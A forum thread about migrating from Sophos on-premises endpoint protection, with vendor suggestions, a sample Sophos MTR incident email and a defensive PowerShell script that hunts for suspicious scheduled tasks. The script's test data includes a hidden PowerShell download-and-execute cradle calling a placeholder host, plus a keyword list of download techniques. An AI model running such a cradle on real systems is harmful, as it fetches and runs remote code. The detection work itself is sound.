CHI-LTD (United Kingdom of Great Britain and Northern Ireland) asked:
Endpoint migration project

Hello

We are looking at either upgrading our existing on-premises endpoint protection or migrating to another provider. Just wanted some ideas/feedback from those who have hopefully used some or all of the below?

Currently using Sophos Enterprise Console 5 (on-prem only). Features used:
- AV
- Firewall
- Tamper protection
- Application control
- Data control
- Device control
- Exploit protection

Not using:
- Patch
- Web

We reviewed Bitdefender some years ago and liked it a lot, but it was missing a firewall. Since then it appears all the vendors out there don't have their own FW, but use the Windows one.

We would like to continue with the current features where possible, possibly add patch management and some form of blocking .exe and .msi files downloaded from the web, if possible.

We have shortlisted the following:

- Bitdefender - Ultra or Elite
- Check Point - not sure which version
- CrowdStrike (seems pricey)
- Sophos Cloud

Any suggestions?

Thanks
strivoli (Italy) replied:

I use ESET and it does a very good job. I didn't notice if it includes FW functionality since I use Windows built in FW.
"ESET Endpoint Security" includes a Firewall.
CHI-LTD (asker):

Its own firewall, or does it leverage the Windows one with ESET policies?
AFAIK its own.
CHI-LTD (asker):

Does it cover all the other modules?

- Tamper protection
- Application control
- Data control
- Device control
- Exploit protection
- Patch
- Web

We moved from Sophos on-prem to Sophos Cloud with Intercept X and now Sophos MTR. So far we are really impressed. Here is an email we got recently regarding some activity. Some machine-specific details have been changed.

The EDR and MTR products capture process activity on the endpoint, so you can see what happened. No more guessing whether there is ongoing malicious activity. You can run commands on the remote endpoint as the SYSTEM account to perform remediation, as can the Sophos MTR team if you get MTR. With MTR you get automated and proactive threat hunting. They told us about a scheduled task on another machine that I believe was running VBScript to execute PowerShell to try to download something from a web site. Very naughty behavior, but not something that regular AV can catch, as all of the programs involved are allowed.

--------------------------------------------------

user@sophos.com
Mar 10, 8:20 pm +0000
Team,
Case ID: 2-0000
Customer: My Company
Date: 2021-03-10 13:26:57 UTC
Associated Host:
Host: PC001
IP: 192.168.4.18
MAC: 00:b1:1c:38:9d:ab
User: user1
// Analysis:
On March 10th 2021, the Sophos MTR team responded to a detection for malicious activity on the host PC001 (HPmal/Crushr-BJ). After review we determined that the user opened a zip archive from an Outlook email that contained a malicious Excel document. Sophos prevented the execution of the malicious content and no follow-up activity was observed.
 
Additionally, we did not find any persistence or other indicators of compromise on the hosts. At this time, we recommend performing the below-referenced remediation steps. If you have any questions regarding this escalation, please reply to this email.
 
// Recommendations:
Submit the zip archive to SophosLabs
• https://support.sophos.com/support/s/filesubmission?language=en_US
Delete the zip archive from disk
• C:\Users\user1\AppData\Local\Microsoft\windows\inetcache\Content.Outlook\LON3P5EA\Comission_2117721587_03172021.zip
 
// Technical Details:
Detection ID: SOPHOS-SAV-HPmal-Crushr-BJ
Name: Sophos Events Queries
Description: This detection is part of HIPS. This detection type is made by collating run-time process behaviors and then processing them through the Sophos Anti-Virus engine as they occur, aiming to make a qualified malicious detection.
Zip Archive: C:\Users\user1\AppData\Local\Microsoft\windows\inetcache\Content.Outlook\LON3P5EA\Comission_2117721587_03172021.zip
Excel Document: comission_2117721587_03172021.xlsm
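The scheduled-task pattern described in the post above (a script host such as wscript.exe launching PowerShell to fetch something from the web) is also something you can hunt for yourself with the built-in ScheduledTasks cmdlets, whether or not you buy a managed service. The script below is an added example written for this page; it is not Sophos code and not part of the original post. The lists of script hosts and download-style keywords are assumptions you should tune for your estate, and the three sample actions at the bottom are constructed to show what the check flags.

```powershell
# Added example, not from the original thread: flag scheduled tasks whose
# action runs a script host / PowerShell with download-style arguments.
# Run in an elevated PowerShell session on a Windows endpoint.

# Assumed lists; extend for your environment.
$ScriptHosts = @('wscript.exe', 'cscript.exe', 'mshta.exe',
                 'powershell.exe', 'pwsh.exe', 'cmd.exe')
$DownloadPatterns = @(
    'DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'iwr ',
    'Invoke-Expression', 'iex ', 'Net.WebClient', 'bitsadmin', 'certutil',
    'http://', 'https://', '-enc', '-EncodedCommand'
)

function Test-SuspiciousAction {
    # Returns $true when an exec action looks like "script host -> download".
    param(
        [Parameter(Mandatory)] [string] $Execute,
        [AllowEmptyString()] [string] $Arguments = ''
    )
    $exe = [System.IO.Path]::GetFileName($Execute.Trim('"')).ToLowerInvariant()
    if ($ScriptHosts -notcontains $exe) { return $false }

    # -match is case-insensitive by default; escape so '.' and '-' are literal.
    $cmdline = "$Execute $Arguments"
    foreach ($p in $DownloadPatterns) {
        if ($cmdline -match [regex]::Escape($p)) { return $true }
    }

    # A script host running a script from a user-writable location is worth
    # a look even when no URL appears inline (the URL may be inside the .vbs).
    if ($exe -in @('wscript.exe', 'cscript.exe', 'mshta.exe') -and
        $Arguments -match '\\(Users|ProgramData|Temp)\\') { return $true }

    return $false
}

function Find-SuspiciousScheduledTask {
    # Emits one object per suspicious exec action across all registered tasks.
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # COM-handler actions have no Execute/Arguments; skip them.
            if (-not $action.PSObject.Properties['Execute']) { continue }
            if (Test-SuspiciousAction -Execute $action.Execute `
                                      -Arguments ([string]$action.Arguments)) {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    Author    = $task.Author
                    RunAs     = $task.Principal.UserId
                    State     = $task.State
                    Execute   = $action.Execute
                    Arguments = $action.Arguments
                }
            }
        }
    }
}

# Constructed sample actions (not real tasks) showing what the check flags.
$samples = @(
    @{ Execute = 'wscript.exe'
       Arguments = '//B C:\Users\user1\AppData\Roaming\update.vbs' },
    @{ Execute = 'powershell.exe'
       Arguments = '-nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"' },
    @{ Execute = '%windir%\system32\sc.exe'
       Arguments = 'start wuauserv' }
)
foreach ($s in $samples) {
    '{0,-6} {1} {2}' -f (Test-SuspiciousAction @s), $s.Execute, $s.Arguments
}

# Live hunt, only where the ScheduledTasks module is present.
if (Get-Command Get-ScheduledTask -ErrorAction SilentlyContinue) {
    Find-SuspiciousScheduledTask | Format-Table -AutoSize
}
```

The first two samples are flagged (user-writable .vbs path; PowerShell with DownloadString and IEX) and the third is not. Keyword matching like this is a triage aid, not a verdict: a benign task can legitimately call Invoke-WebRequest, so review the task's Author, RunAs and creation context before deleting anything, and export the task XML (Export-ScheduledTask) for the case file first.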
CHI-LTD (asker):

MTR being what most call EDR?

No, MTR is Managed Threat Response. MTR is EDR+Managed service.

EDR is when you do all of the work yourself using the same endpoint agent.
ASKER CERTIFIED SOLUTION (by CHI-LTD, United Kingdom of Great Britain and Northern Ireland)